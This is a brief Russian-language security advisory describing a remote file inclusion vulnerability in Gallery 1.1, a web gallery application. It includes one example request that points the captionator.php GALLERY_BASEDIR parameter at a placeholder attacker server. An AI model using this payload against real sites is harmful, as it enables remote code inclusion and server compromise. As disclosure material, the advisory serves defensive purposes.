Gallery - лучшее на сегодняшний день Web приложение
для построения галерей. Уязвимость, обнаруженная в Gallery, позволяет удаленным атакующим включать произвольные файлы расположенные на других серверах. Пример:
http://hostname/gallery/captionator.php?GALLERY_BASEDIR=http://your.evil.server.tdl/
Уязвимость обнаружена в Bharat Mediratta Gallery 1.1.
